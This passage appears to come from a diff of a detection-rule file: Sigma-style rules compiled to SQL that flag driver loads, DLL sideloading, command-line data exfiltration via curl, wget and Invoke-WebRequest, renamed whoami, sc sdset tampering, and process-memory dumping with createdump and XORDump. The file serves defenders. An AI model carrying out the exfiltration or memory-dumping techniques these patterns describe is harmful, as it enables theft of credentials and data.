('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_gigabyte_driver.yml" + "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" }, { - "title": "Suspicious Driver Load from Temp", - "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", - "status": "test", - "description": "Detects a driver load from a temporary directory", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Data Exfiltration Activity Via CommandLine Tools", + "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "status": "experimental", + "description": "Detects the use of various CLI utilities exfiltrating data via web requests", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "There is a relevant set of false positives depending on applications in the environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" ], - "filename": "driver_load_win_susp_temp_use.yml" + "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" }, { - "title": "Vulnerable HW Driver Load", - "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", - "status": "experimental", - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "title": "Renamed Whoami Execution", + "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "status": "test", + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'whoami.exe' AND NOT (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_hw_driver.yml" + "filename": "proc_creation_win_renamed_whoami.yml" }, { - "title": "DLL Sideloading Of DBGHELP.DLL", - "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "title": "CreateDump Process Dump", + "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "status": "experimental", - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" ], - "filename": "image_load_side_load_dbghelp_dll.yml" + "filename": "proc_creation_win_createdump_lolbin_execution.yml" }, { - "title": "Potential System DLL Sideloading From Non System Locations", - "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - XORDump Execution", + "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "status": "test", + "description": "Detects suspicious use of XORDump process memory dumping utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + "Another tool that uses the command line switches of XORdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded 